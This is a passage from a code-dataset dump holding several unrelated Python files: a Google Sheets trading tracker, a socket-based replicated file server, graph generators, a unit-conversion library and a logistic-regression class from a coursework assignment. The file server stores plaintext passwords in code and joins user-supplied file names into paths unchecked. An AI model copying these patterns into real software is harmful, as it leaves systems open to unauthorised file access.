on_session_ended(event['request'], event['session'])\n","sub_path":"Deploy/skill.py","file_name":"skill.py","file_ext":"py","file_size_in_byte":7405,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"291220186","text":"from connect import *\r\n\r\nsheet = Connect(\"Weekly Buy-Sell\", \"Clean\")\r\nnames = sheet.row_values(2)\r\n\r\n\r\ndef filterData(a, b): # will return a list of dictionary containg rows to be processed\r\n # a, b is the range of rows which need to be processed\r\n # this is an examle of an element of the list\r\n '''{'Call': 'Long',\r\n 'DHigh': '447.3',\r\n 'Dlow': '436.55',\r\n 'Live': '443.15',\r\n 'Price': '446.3',\r\n 'Risk/Reward': '0.27',\r\n 'SL%': '1.68%',\r\n 'Status': '',\r\n 'Stock Name': 'CONCOR',\r\n 'Stop Loss': '438.8',\r\n 'Target': '474.3',\r\n 'Target%': '6.27%',\r\n 'Timestamp': '26/07/2020',\r\n 'Trade': '',\r\n 'Trade_High': '447.3',\r\n 'Trade_LTP': '443.15',\r\n 'Trade_Low': '436.55'}'''\r\n # for every row there will be one dictionary element present\r\n mix = []\r\n range_data = sheet.get(\"A{}:Q{}\".format(a, b))\r\n for i in range(len(range_data)):\r\n temp = {}\r\n for j in range(17):\r\n temp[names[j]] = range_data[i][j]\r\n mix.append(temp)\r\n return mix\r\n\r\n\r\ndef updatPrice(row): # update daily price\r\n # check if trade is Exited or not\r\n if row[\"Trade\"] != \"Exit\":\r\n try:\r\n # update Trade_LTP\r\n row[\"Trade_LTP\"] = float(row[\"Live\"])\r\n # update Trade_Low price\r\n if float(row[\"Trade_Low\"]) > float(row[\"DLow\"]):\r\n row[\"Trade_Low\"] = row[\"DLow\"]\r\n # update Trade_high price\r\n if float(row[\"Trade_High\"]) < float(row[\"DHigh\"]):\r\n row[\"Trade_High\"] = row[\"DHigh\"]\r\n except Exception:\r\n pass\r\n\r\n\r\ndef tradeConfirmation(row): # check wethere a trade has been taken or not\r\n if row[\"Call\"] == \"Long\":\r\n try:\r\n if float(row[\"Trade_Low\"]) <= float(row[\"Price\"]):\r\n row[\"Trade\"] = 'In'\r\n return True\r\n else:\r\n row['Trade'] = 'Out'\r\n return False\r\n except Exception:\r\n print(\">>Something wrong with \", row[\"Stock Name\"])\r\n\r\n else:\r\n # short position\r\n if row[\"Call\"] == \"Short\":\r\n try:\r\n if float(row[\"Trade_Low\"]) >= float(row[\"Price\"]):\r\n row[\"Trade\"] = 'In'\r\n return True\r\n else:\r\n row['Trade'] = 'Out'\r\n return False\r\n except Exception:\r\n print(\">>Something wrong with \", row[\"Stock Name\"])\r\n\r\n\r\ndef checkStop(row): # check if the stock has hit stop loss or not\r\n if row[\"Trade\"] == \"In\":\r\n if float(row[\"Trade_LTP\"]) <= float(row[\"Stop Loss\"]):\r\n row[\"Status\"] = 'Stoped'\r\n row[\"Trade\"] = \"Exit\" # will marke the trade as complete\r\n else:\r\n row[\"Status\"] = 'Between'\r\n\r\n\r\ndef checkTatget(row): # check if the stock has hit target price or not\r\n if row[\"Trade\"] == \"In\":\r\n if float(row[\"Trade_LTP\"]) >= float(row[\"Target\"]):\r\n row[\"Status\"] = 'Target'\r\n row[\"Trade\"] = \"Exit\" # will marke the trade as complete\r\n else:\r\n row[\"Status\"] = 'Between'\r\n\r\n\r\ndef update2Sheet(): # write the updated data to google sheet\r\n updatedData = []\r\n for i in rows:\r\n updatedData.append([i[\"Trade\"], i[\"Status\"], float(i[\"Trade_LTP\"]),\r\n float(i[\"Trade_Low\"]), float(i[\"Trade_High\"])])\r\n sheet.update('M{}:Q{}'.format(a, b), updatedData)\r\n\r\n\r\ndef start(): # it will ask row number to be updated and will process all the data\r\n global rows, a, b\r\n a, b = map(int, input(\"Enter Row Numbers: \").split())\r\n print(\"Importing Data\")\r\n rows = filterData(a, b)\r\n print(\"Processing Data\")\r\n for i in rows:\r\n updatPrice(i)\r\n tradeConfirmation(i)\r\n checkTatget(i)\r\n checkStop(i)\r\n update2Sheet()\r\n print(\"Done\")\r\n\r\n\r\nif __name__ == \"__main__\":\r\n start()\r\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3973,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"296799811","text":"\n\nfrom xai.brain.wordbase.adjectives._bandy import _BANDY\n\n#calss header\nclass _BANDIER(_BANDY, ):\n\tdef __init__(self,): \n\t\t_BANDY.__init__(self)\n\t\tself.name = \"BANDIER\"\n\t\tself.specie = 'adjectives'\n\t\tself.basic = \"bandy\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/adjectives/_bandier.py","file_name":"_bandier.py","file_ext":"py","file_size_in_byte":243,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"72734641","text":"#!/usr/bin/env python3\n\nimport socket, sys, os, signal\nimport szasar\nimport select\n\nPORT2 = 6014\nFILES_PATH = \"files2\"\nMAX_FILE_SIZE = 10 * 1 << 20 # 10 MiB\nSPACE_MARGIN = 50 * 1 << 20 # 50 MiB\nUSERS = (\"anonymous\", \"sar\", \"sza\")\nPASSWORDS = (\"\", \"sar\", \"sza\")\nSERVER = 'localhost'\nPORT_R = 6015\nPORT_ALT = 6017\nuser = \"\"\nfilename = \"\"\nfilesize = 0\n\n\ndef comprobar(s_alt):\n while (1):\n preparados, _, _ = select.select([s_alt], [], [], 10)\n if (len(preparados) == 0):\n print (\"HA FALLADO EL SERVIDOR PRIMARIO\")\n else:\n szasar.recvline(s_alt).decode(\"ascii\")\n s_alt.sendall(\"OK\\r\\n\".encode(\"ascii\"))\n\n\ndef empty_socket(sock):\n\tinput = sock\n\twhile 1:\n\t\tinputready, o, e = select.select(input, [], [], 0.0)\n\t\tif len(inputready) == 0: break\n\t\tfor s in inputready: s.recv(1)\n\t\tbreak\n\n\nclass State:\n Identification, Authentication, Main, Downloading, Uploading = range(5)\n\nstate = State.Identification\n\ndef sendOK(s, params=\"\"):\n s.sendall((\"OK{}\\r\\n\".format(params)).encode(\"ascii\"))\n\n\ndef sendER(s, code=1):\n s.sendall((\"ER{}\\r\\n\".format(code)).encode(\"ascii\"))\n\ndef tratarMensaje(message,s):\n print (\"tratado: \"+ message)\n global FILES_PATH\n global user\n global filename\n global filesize\n global state\n\n if message.startswith(szasar.Command.User):\n if (state != State.Identification):\n sendER(s)\n try:\n user = USERS.index(message[4:])\n except:\n sendER(s, 2)\n else:\n sendOK(s)\n state = State.Authentication\n\n elif message.startswith(szasar.Command.Password):\n if state != State.Authentication:\n sendER(s)\n if ( user == 0 or PASSWORDS[user] == message[4:]):\n FILES_PATH = FILES_PATH + \"/\" + USERS[user]\n\n sendOK(s)\n state = State.Main\n\n else:\n sendER(s, 3)\n state = State.Identification\n\n elif message.startswith(szasar.Command.List):\n if state != State.Main:\n sendER(s)\n try:\n message = \"OK\\r\\n\"\n for filename in os.listdir(FILES_PATH):\n filesize = os.path.getsize(os.path.join(FILES_PATH, filename))\n message += \"{}?{}\\r\\n\".format(filename, filesize)\n message += \"\\r\\n\"\n except:\n sendER(s, 4)\n else:\n s.sendall(message.encode(\"ascii\"))\n\n elif message.startswith(szasar.Command.Download):\n if state != State.Main:\n sendER\n filename = os.path.join(FILES_PATH, message[4:])\n try:\n filesize = os.path.getsize(filename)\n except:\n sendER(s, 5)\n else:\n sendOK(s, filesize)\n state = State.Downloading\n\n elif message.startswith(szasar.Command.Download2):\n if state != State.Downloading:\n sendER(s)\n state = State.Main\n try:\n with open(filename, \"rb\") as f:\n filedata = f.read()\n except:\n sendER(s, 6)\n else:\n sendOK(s)\n s.sendall(filedata)\n\n elif message.startswith(szasar.Command.Upload):\n if state != State.Main:\n sendER(s)\n if user == 0:\n sendER(s, 7)\n filename, filesize = message[4:].split('?')\n filesize = int(filesize)\n if filesize > MAX_FILE_SIZE:\n sendER(s, 8)\n svfs = os.statvfs(FILES_PATH)\n if filesize + SPACE_MARGIN > svfs.f_bsize * svfs.f_bavail:\n sendER(s, 9)\n sendOK(s)\n state = State.Uploading\n\n elif message.startswith(szasar.Command.Upload2):\n if state != State.Uploading:\n sendER(s)\n state = State.Main\n try:\n with open(os.path.join(FILES_PATH, filename), \"wb\") as f:\n filedata = szasar.recvall(s, filesize)\n f.write(filedata)\n except:\n sendER(s, 10)\n else:\n sendOK(s)\n\n elif message.startswith(szasar.Command.Delete):\n if state != State.Main:\n sendER(s)\n\n if user == 0:\n sendER(s, 7)\n\n try:\n os.remove(os.path.join(FILES_PATH, message[4:]))\n except:\n sendER(s, 11)\n else:\n sendOK(s)\n\n elif message.startswith(szasar.Command.Exit):\n sendOK(s)\n return\n\n else:\n sendER(s)\n\n\n\ndef difundir(message, sr):\n message_r = message + \"\\r\\n\"\n sr.sendall(message_r.encode(\"ascii\"))\n\ndef session(s, sr):\n ULTIMO = 0\n inputs = [s, sr]\n while True:\n disponibles = 0\n while disponibles == 0:\n inready, outready, excready = select.select(inputs, [], [])\n disponibles = len(inready)\n print (\"SOCKETS CON MENSAJE \" + str(disponibles))\n\n\n if (disponibles == 1):\n if (s in inready):\n print (\"MENSAJE DE S\")\n message = szasar.recvline(s).decode(\"ascii\")\n print (message)\n if (int(message[:4]) > int(ULTIMO)):\n ULTIMO = message[:4]\n difundir(message, sr)\n tratarMensaje(message[4:], s)\n elif (sr in inready):\n print(\"MENSAJE DE SR\")\n message = szasar.recvline(sr).decode(\"ascii\")\n print(message)\n if (int(message[:4]) > int(ULTIMO)):\n ULTIMO = message[:4]\n tratarMensaje(message[4:], s)\n\n elif (disponibles == 2):\n print (\"ESTAN LOS DOS\")\n message_s = szasar.recvline(s).decode()\n message_r = szasar.recvline(sr).decode()\n ID_s = message_s[:4]\n ID_r = message_r[:4]\n if (int(ID_s) > int(ULTIMO)):\n ULTIMO = message_s[:4]\n difundir(message_s, sr)\n tratarMensaje(message_s[4:], s)\n if (int(ID_r) > int(ULTIMO)):\n ULTIMO = message_r[:4]\n tratarMensaje(message_r[4:], s)\n\n\nif __name__ == \"__main__\":\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.connect((SERVER, PORT2))\n\n sr = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n sr.connect((SERVER, PORT_R))\n\n\n session(s, sr)\n\n","sub_path":"serv_fich_r2.py","file_name":"serv_fich_r2.py","file_ext":"py","file_size_in_byte":6281,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"491930452","text":"import random as rnd\nfrom sets import Set\n \ndef grafoCompleto(n,salida):\n # genero 5 grafos completos de mismo tam y pesos random\n canttesteos = 5\n fOut = open(salida, 'w')\n fOut.write(str(canttesteos) + '\\n')\n for t in range(1,canttesteos + 1):\n fOut.write(str(n)+ \" \" + str(n*(n-1)) + '\\n')\n for i in range(1,n + 1):\n for j in range(1,n+1):\n if j != i:\n linea = str(i)+ \" \" + str(j) \n fOut.write(linea + '\\n')\n fOut.write(\"-1 -1\"+'\\n')\n\ndef grafoCicloSimple(n,salida):\n # genero 5 grafos que son un unico ciclo simple\n canttesteos = 5\n fOut = open(salida, 'w')\n fOut.write(str(canttesteos) + '\\n')\n for t in range(1,canttesteos + 1):\n fOut.write(str(n)+ \" \" + str(n) + '\\n')\n for i in range(1,n + 1):\n j = i+1\n if j > n:\n j = 1\n linea = str(i)+ \" \" + str(j) \n fOut.write(linea + '\\n')\n fOut.write(\"-1 -1\"+'\\n')\n\ndef grafoRnd(n,salida):\n # 5 grafos random con por lo menos un ciclo\n fOut = open(salida, 'w')\n m = rnd.randint(n, n*(n-1))\n fOut.write(str(n)+ \" \" + str(m) + '\\n')\n k=0\n #me armo una matriz de adyacencias para ver que no repito aristas\n #matriz = [[ 0 for x in range(n)] for y in range(n)]\n matriz = []\n for i in range(n):\n matriz.append([])\n for j in range(n):\n matriz[i].append(None)\n matriz[i][j] = 0\n #armo un ciclo\n for i in range(1,n + 1):\n j = i+1\n if j > n:\n j = 1\n linea = str(i)+ \" \" + str(j)\n matriz[i-1][j-1]=1\n k = k +1 \n fOut.write(linea + '\\n')\n #armo aristas aleatorias viendo que no se repitan\n while k < m:\n for i in range(1,n + 1):\n base = rnd.randint(1,n)\n cant = rnd.randint(1,n)\n tope = rnd.randint(base, min(n, base+cant)) \n for j in range(base, tope):\n if k >= m:\n j = tope\n i = n+1\n else:\n nodoDestino = rnd.randint(base, tope)\n if matriz[i-1][nodoDestino-1] != 1 and i != nodoDestino:\n matriz[i-1][nodoDestino-1]=1\n linea = str(i)+ \" \" + str(nodoDestino) \n fOut.write(linea + '\\n')\n k = k+1\n\ndef grafoMaloMalosoGRASP(tamClique,salida):\n gradoAlto = (tamClique * 2) -1\n n = tamClique + tamClique * (tamClique-1) + tamClique * ((2*tamClique)-2)\n m = tamClique*(tamClique-1) + tamClique * (tamClique-1) + tamClique * ((2*tamClique)-2)\n fOut = open(salida, 'w')\n fOut.write(str(n)+ \" \" + str(m) + '\\n')\n for i in range(1,tamClique + 1):\n for j in range(1,tamClique+1):\n if j != i:\n linea = str(i)+ \" \" + str(j) \n fOut.write(linea + '\\n')\n nodo = tamClique+1\n altosNodos = []\n for i in range(1,tamClique + 1):\n altosNodos.append(nodo)\n for j in range(0,tamClique-1):\n linea = str(i)+ \" \" + str(nodo) \n fOut.write(linea + '\\n')\n nodo += 1\n for nAlto in altosNodos:\n for i in range(gradoAlto-1):\n linea = str(nAlto)+ \" \" + str(nodo) \n fOut.write(linea + '\\n')\n nodo+=1 \n#blabla\nfor i in range(10,201):\n out = \"./GrafoMM\" + str(i)\n grafoMaloMalosoGRASP(i,out)","sub_path":"Algoritmos y Estructuras de Datos 3/tp3/CrearGrafos.py","file_name":"CrearGrafos.py","file_ext":"py","file_size_in_byte":3451,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"294653558","text":"#!/usr/bin/env python\n# coding=utf-8\n\nfrom decimal import Decimal as D\n\nfrom unit_converter.exceptions import UnConsistentUnitsError\n\n\nclass UnitPrefix(object):\n\n def __init__(self, symbol, name, factor):\n self.symbol = symbol\n self.name = name\n\n if isinstance(factor, str):\n self.factor = D(factor)\n elif isinstance(factor, D):\n self.factor = factor\n else:\n raise TypeError(\"factor need to be a 'string' or a\"\n \" 'decimal.Decimal' class\")\n\n def __repr__(self):\n return (\"UnitPrefix(symbol='%s', name='%s', factor='%s')\" %\n (self.symbol, self.name, self.factor))\n\n def is_same_factor(self, other_prefix):\n return self.factor == other_prefix.factor\n\n def __eq__(self, other_prefix):\n return (self.symbol == other_prefix.symbol and\n self.name == other_prefix.name and\n self.factor == other_prefix.factor)\n\n def __mul__(self, unit):\n if isinstance(unit, Unit):\n final_unit = Unit(symbol=self.symbol + unit.symbol,\n name=self.name + unit.name,\n L=unit.L,\n M=unit.M,\n T=unit.T,\n I=unit.I,\n THETA=unit.THETA,\n N=unit.N,\n J=unit.J,\n coef=self.factor * unit.coef,\n offset=unit.offset)\n return final_unit\n else:\n raise TypeError(\"unsupported operand type(s) for : '%s' and '%s'\" %\n (type(self), type(unit)))\n\n\nclass Unit(object):\n\n def __init__(self, symbol, name, plural_name=None,\n L=0, M=0, T=0, I=0, THETA=0, N=0, J=0,\n coef=D('1'), offset=D('0')):\n self.symbol = symbol\n self.name = name\n self.plural_name = plural_name or name\n self.coef = coef\n self.offset = offset\n\n # Dimensional quantities\n # -----------------------\n self.L = L # Length\n self.M = M # Mass\n self.T = T # Time\n self.I = I # Electric current\n self.THETA = THETA # Thermodynamic temperature\n self.N = N # Amount of substance\n self.J = J # Light intensity\n\n def __repr__(self):\n # TODO: Add a better representation including coef and offset.\n # TODO: Hide plotting 0 dimension\n l_units_r = (\"m^%s\", \"kg^%s\", \"s^%s\", \"A^%s\", \"K^%s\", \"mol^%s\", \"cd^%s\")\n units = (self.L, self.M, self.T, self.I, self.THETA, self.N, self.J)\n\n unit_r = [r % units[idx] for idx, r in enumerate(l_units_r) if units[idx]]\n return '*'.join(unit_r)\n\n def is_same_dimension(self, other_unit):\n return (self.L == other_unit.L and\n self.M == other_unit.M and\n self.T == other_unit.T and\n self.I == other_unit.I and\n self.THETA == other_unit.THETA and\n self.N == other_unit.N and\n self.J == other_unit.J)\n\n def __eq__(self, other):\n return (self.is_same_dimension(other) and\n self.coef == other.coef and\n self.offset == other.offset)\n\n def __mul__(self, other):\n if isinstance(other, Unit):\n return self.__class__(symbol=self.symbol + '*' + other.symbol,\n name=self.name + '*' + other.name,\n L=self.L + other.L,\n M=self.M + other.M,\n T=self.T + other.T,\n I=self.I + other.I,\n THETA=self.THETA + other.THETA,\n N=self.N + other.N,\n J=self.J + other.J,\n coef=self.coef * other.coef,\n offset=self.offset + other.offset)\n elif type(other) in (int, float, D):\n return Quantity(value=other, unit=self)\n else:\n raise TypeError(\"unsupported operand type(s) for : '%s' and '%s'\" %\n (type(self), type(other)))\n\n def __pow__(self, power):\n if type(power) in (int, float, D):\n if self.offset:\n new_offset = self.offset**D(power)\n else:\n new_offset = self.offset\n final_unit = self.__class__(symbol=self.symbol + '^' + str(power), # TODO: attention manque des parenthèses etc..\n name=self.name + '^' + str(power),\n L=self.L * power,\n M=self.M * power,\n T=self.T * power,\n I=self.I * power,\n THETA=self.THETA * power,\n N=self.N * power,\n J=self.J * power,\n coef=self.coef**D(power),\n offset=new_offset)\n return final_unit\n else:\n raise TypeError(\"unsupported operand type(s) for : '%s' and '%s'\" %\n (type(self), type(power)))\n\n def __truediv__(self, other):\n return self.__pow__(-1)\n\n def __rmul__(self, other):\n return self.__mul__(other)\n\n def __rtruediv__(self, other):\n return self.__truediv__(other)\n\n\nclass Quantity(object):\n\n def __init__(self, value, unit):\n if type(value) in (int, float, D):\n self.value = value\n else:\n raise TypeError(\"value must be an int, float or decimal class\")\n\n if isinstance(unit, Unit):\n self.unit = unit\n else:\n raise TypeError(\"unit must be an Unit class\")\n\n def convert(self, desired_unit: Unit):\n # Check dimension from current and desired units\n if not desired_unit.is_same_dimension(self.unit):\n raise UnConsistentUnitsError(desired_unit.name, self.unit.name)\n\n default_value = self.unit.offset + self.value * self.unit.coef\n desired_value = (-desired_unit.offset + default_value) / desired_unit.coef\n return self.__class__(value=desired_value, unit=self.unit)\n\n def __repr__(self):\n return str(self.value) + ' ' + str(self.unit)\n\n def __add__(self, other):\n if isinstance(other, Quantity):\n if self.unit == other.unit:\n return self.__class__(self.value + other.value, self.unit)\n\n def __sub__(self, other):\n if isinstance(other, Quantity):\n if self.unit == other.unit:\n return self.__class__(self.value - other.value, self.unit)\n\n def __mul__(self, other):\n if isinstance(other, Quantity):\n if self.unit == other.unit:\n return self.__class__(self.value * other.value,\n self.unit * other.unit)\n\n def __truediv__(self, other):\n if isinstance(other, Quantity):\n if self.unit == other.unit:\n return self.__class__(self.value / other.value,\n self.unit / other.unit)\n\n def __radd__(self, other):\n return self.__add__(other)\n\n def __rsub__(self, other):\n return self.__sub__(other)\n\n def __rmul__(self, other):\n return self.__mul__(other)\n\n def __rtruediv__(self, other):\n return self.__truediv__(other)\n","sub_path":"venvwindows/Lib/site-packages/unit_converter/units.py","file_name":"units.py","file_ext":"py","file_size_in_byte":7757,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"196025317","text":"from __future__ import print_function\r\nimport math\r\nimport random\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\n\"\"\"\r\nThis file is part of the computer assignments for the course DD1418/DD2418 Language engineering at KTH.\r\nCreated 2017 by Johan Boye, Patrik Jonell and Dmytro Kalpakchi.\r\n\"\"\"\r\n\r\nclass BinaryLogisticRegression(object):\r\n \"\"\"\r\n This class performs binary logistic regression using batch gradient descent\r\n or stochastic gradient descent\r\n \"\"\"\r\n\r\n\r\n def __init__(self, x=None, y=None, theta=None):\r\n \"\"\"\r\n Constructor. Imports the data and labels needed to build theta.\r\n\r\n @param x The input as a DATAPOINT*FEATURES array.\r\n @param y The labels as a DATAPOINT array.\r\n @param theta A ready-made model. (instead of x and y)\r\n \"\"\"\r\n\r\n # ------------- Hyperparameters ------------------ #\r\n\r\n self.LEARNING_RATE = 0.01 # The learning rate.\r\n self.CONVERGENCE_MARGIN = 0.001 # The convergence criterion.\r\n self.MAX_ITERATIONS = 1 # Maximal number of passes through the datapoints in stochastic gradient descent.\r\n self.MINIBATCH_SIZE = 1000 # Minibatch size (only for minibatch gradient descent)\r\n\r\n # ----------------------------------------------------------------------\r\n\r\n if not any([x, y, theta]) or all([x, y, theta]):\r\n raise Exception('You have to either give x and y or theta')\r\n\r\n if theta:\r\n self.FEATURES = len(theta)\r\n self.theta = theta\r\n\r\n elif x and y:\r\n # Number of datapoints.\r\n self.DATAPOINTS = len(x)\r\n\r\n # Number of features.\r\n self.FEATURES = len(x[0]) + 1\r\n\r\n # Encoding of the data points (as a DATAPOINTS x FEATURES size array).\r\n self.x = np.concatenate((np.ones((self.DATAPOINTS, 1)), np.array(x)), axis=1)\r\n\r\n # Correct labels for the datapoints.\r\n self.y = np.array(y)\r\n\r\n # The weights we want to learn in the training phase.\r\n self.theta = np.random.uniform(-1, 1, self.FEATURES)\r\n\r\n # The current gradient.\r\n self.gradient = np.zeros(self.FEATURES)\r\n\r\n self.training_iteration = 0\r\n\r\n\r\n # ----------------------------------------------------------------------\r\n\r\n\r\n def sigmoid(self, z):\r\n \"\"\"\r\n The logistic function.\r\n \"\"\"\r\n return 1.0 / ( 1 + math.exp(-z) )\r\n\r\n\r\n def conditional_prob(self, label, datapoint):\r\n \"\"\"\r\n Computes the conditional probability P(label|datapoint)\r\n \"\"\"\r\n\r\n # REPLACE THE COMMAND BELOW WITH YOUR CODE\r\n feat_vec = self.x[datapoint]\r\n\r\n if label == 1:\r\n return self.conditional_prob_1(feat_vec)\r\n\r\n return 1 - self.conditional_prob_1(feat_vec)\r\n\r\n def conditional_prob_1(self, feat_vec):\r\n\r\n return self.sigmoid(np.dot(self.theta, feat_vec))\r\n\r\n\r\n def compute_gradient_for_all(self):\r\n \"\"\"\r\n Computes the gradient based on the entire dataset\r\n (used for batch gradient descent).\r\n \"\"\"\r\n\r\n # YOUR CODE HERE\r\n self.compute_gradient_for_subset(0, self.DATAPOINTS)\r\n\r\n def compute_gradient_for_subset(self, start_point, end_point):\r\n for feature in range(self.FEATURES):\r\n new_gradient = 0\r\n for datapoint in range(start_point, end_point):\r\n new_gradient += self.compute_feat_gradient(datapoint, feature) / (end_point-start_point)\r\n\r\n self.gradient[feature] = new_gradient\r\n\r\n def compute_feat_gradient(self, datapoint, feature):\r\n return self.x[datapoint][feature] * (\r\n self.conditional_prob_1(self.x[datapoint]) - self.y[datapoint])\r\n\r\n\r\n def compute_gradient_minibatch(self, minibatch):\r\n \"\"\"\r\n Computes the gradient based on a minibatch\r\n (used for minibatch gradient descent).\r\n \"\"\"\r\n \r\n # YOUR CODE HERE\r\n start_point = (minibatch-1) * self.MINIBATCH_SIZE\r\n end_point = minibatch * self.MINIBATCH_SIZE\r\n\r\n self.compute_gradient_for_subset(start_point, end_point)\r\n\r\n\r\n def compute_gradient(self, datapoint):\r\n \"\"\"\r\n Computes the gradient based on a single datapoint\r\n (used for stochastic gradient descent).\r\n \"\"\"\r\n\r\n # YOUR CODE HERE\r\n for feature in range(self.FEATURES):\r\n self.gradient[feature] = self.compute_feat_gradient(datapoint, feature)\r\n\r\n\r\n def stochastic_fit(self):\r\n \"\"\"\r\n Performs Stochastic Gradient Descent.\r\n \"\"\"\r\n self.init_plot(self.FEATURES)\r\n\r\n # YOUR CODE HERE\r\n\r\n while self.training_iteration == 0 or self.training_iteration < self.MAX_ITERATIONS*self.DATAPOINTS:\r\n print('Iteration: ', self.training_iteration)\r\n datapoint = np.random.randint(0, self.DATAPOINTS)\r\n\r\n self.compute_gradient(datapoint)\r\n self.upd_theta()\r\n\r\n # plot every 100th iteration\r\n if not self.training_iteration % 100:\r\n self.update_plot(np.sum(np.square(self.gradient)))\r\n\r\n self.training_iteration += 1\r\n\r\n\r\n def minibatch_fit(self):\r\n \"\"\"\r\n Performs Mini-batch Gradient Descent.\r\n \"\"\"\r\n self.init_plot(self.FEATURES)\r\n\r\n # YOUR CODE HERE\r\n max_batch_nr = self.DATAPOINTS // self.MINIBATCH_SIZE\r\n batch_nr = 1\r\n\r\n while not self.converged() or self.training_iteration == 0:\r\n print('Processing batch nr: ', batch_nr)\r\n self.compute_gradient_minibatch(batch_nr)\r\n self.upd_theta()\r\n self.update_plot(np.sum(np.square(self.gradient)))\r\n\r\n batch_nr += 1\r\n # start over on first batch if processed all data\r\n batch_nr = batch_nr % max_batch_nr\r\n self.training_iteration += 1\r\n\r\n def fit(self):\r\n \"\"\"\r\n Performs Batch Gradient Descent\r\n \"\"\"\r\n self.init_plot(self.FEATURES)\r\n\r\n # YOUR CODE HERE\r\n\r\n while not self.converged() or self.training_iteration == 0:\r\n print('Iteration: ', self.training_iteration)\r\n\r\n self.compute_gradient_for_all()\r\n self.upd_theta()\r\n self.update_plot(np.sum(np.square(self.gradient)))\r\n\r\n self.training_iteration += 1\r\n\r\n def upd_theta(self):\r\n for k in range(self.FEATURES):\r\n self.upd_feat_theta(k)\r\n\r\n def upd_feat_theta(self, feature):\r\n\r\n self.theta[feature] -= self.LEARNING_RATE * self.gradient[feature]\r\n\r\n def converged(self):\r\n # Convergence = the gradient is close to the zero vector = the\r\n # sum of squares of the gradient[k] is smaller than CONVERGENCE_MARGIN\r\n\r\n sum_of_squares = np.sum(np.square(self.gradient))\r\n print('sum_of_squares: ', sum_of_squares)\r\n\r\n if sum_of_squares < self.CONVERGENCE_MARGIN:\r\n return True\r\n return False\r\n\r\n\r\n def classify_datapoints(self, test_data, test_labels):\r\n \"\"\"\r\n Classifies datapoints\r\n \"\"\"\r\n print('Model parameters:');\r\n\r\n print(' '.join('{:d}: {:.4f}'.format(k, self.theta[k]) for k in range(self.FEATURES)))\r\n\r\n self.DATAPOINTS = len(test_data)\r\n\r\n self.x = np.concatenate((np.ones((self.DATAPOINTS, 1)), np.array(test_data)), axis=1)\r\n self.y = np.array(test_labels)\r\n confusion = np.zeros((self.FEATURES, self.FEATURES))\r\n\r\n for d in range(self.DATAPOINTS):\r\n prob = self.conditional_prob(1, d)\r\n predicted = 1 if prob > .5 else 0\r\n confusion[predicted][self.y[d]] += 1\r\n\r\n accuracy = (confusion[0][0] + confusion[1][1]) / np.sum(confusion)\r\n\r\n # precision = TP /(TP + FP)\r\n precision1 = confusion[1][1] / (confusion[1][1] + confusion[1][0])\r\n precision0 = confusion[0][0] / (confusion[0][0] + confusion[0][1])\r\n\r\n # recall = TP / (TP + FN)\r\n recall1 = confusion[1][1] / (confusion[1][1] + confusion[0][1])\r\n recall0 = confusion[0][0] / (confusion[0][0] + confusion[1][0])\r\n\r\n print('Accuracy = ', accuracy)\r\n print('precision 1 = ', precision1)\r\n print('precision 0 = ', precision0)\r\n print('recall 1 = ', recall1)\r\n print('recall 0 = ', recall0)\r\n\r\n print(' Real class')\r\n print(' ', end='')\r\n print(' '.join('{:>8d}'.format(i) for i in range(2)))\r\n for i in range(2):\r\n if i == 0:\r\n print('Predicted class: {:2d} '.format(i), end='')\r\n else:\r\n print(' {:2d} '.format(i), end='')\r\n print(' '.join('{:>8.3f}'.format(confusion[i][j]) for j in range(2)))\r\n\r\n\r\n def print_result(self):\r\n print(' '.join(['{:.2f}'.format(x) for x in self.theta]))\r\n print(' '.join(['{:.2f}'.format(x) for x in self.gradient]))\r\n\r\n\r\n # ----------------------------------------------------------------------\r\n\r\n def update_plot(self, *args):\r\n \"\"\"\r\n Handles the plotting\r\n \"\"\"\r\n if self.i == []:\r\n self.i = [0]\r\n else:\r\n self.i.append(self.i[-1] + 1)\r\n\r\n for index, val in enumerate(args):\r\n self.val[index].append(val)\r\n self.lines[index].set_xdata(self.i)\r\n self.lines[index].set_ydata(self.val[index])\r\n\r\n self.axes.set_xlim(0, max(self.i) * 1.5)\r\n self.axes.set_ylim(0, max(max(self.val)) * 1.5)\r\n\r\n plt.draw()\r\n plt.pause(1e-20)\r\n\r\n\r\n def init_plot(self, num_axes):\r\n \"\"\"\r\n num_axes is the number of variables that should be plotted.\r\n \"\"\"\r\n self.i = []\r\n self.val = []\r\n plt.ion()\r\n self.axes = plt.gca()\r\n self.lines =[]\r\n\r\n for i in range(num_axes):\r\n self.val.append([])\r\n self.lines.append([])\r\n self.lines[i], = self.axes.plot([], self.val[0], '-', c=[random.random() for _ in range(3)], linewidth=1.5, markersize=4)\r\n\r\n # ----------------------------------------------------------------------\r\n\r\n\r\ndef main():\r\n \"\"\"\r\n Tests the code on a toy example.\r\n \"\"\"\r\n x = [\r\n [ 1,1 ], [ 0,0 ], [ 1,0 ], [ 0,0 ], [ 0,0 ], [ 0,0 ],\r\n [ 0,0 ], [ 0,0 ], [ 1,1 ], [ 0,0 ], [ 0,0 ], [ 1,0 ],\r\n [ 1,0 ], [ 0,0 ], [ 1,1 ], [ 0,0 ], [ 1,0 ], [ 0,0 ]\r\n ]\r\n\r\n # Encoding of the correct classes for the training material\r\n y = [1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 1, 0]\r\n b = BinaryLogisticRegression(x, y)\r\n b.fit()\r\n b.print_result()\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","sub_path":"Assignment 2/a02/NER/BinaryLogisticRegression.py","file_name":"BinaryLogisticRegression.py","file_ext":"py","file_size_in_byte":10702,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"533159608","text":"from scrabble import Scrabble\n\ns = 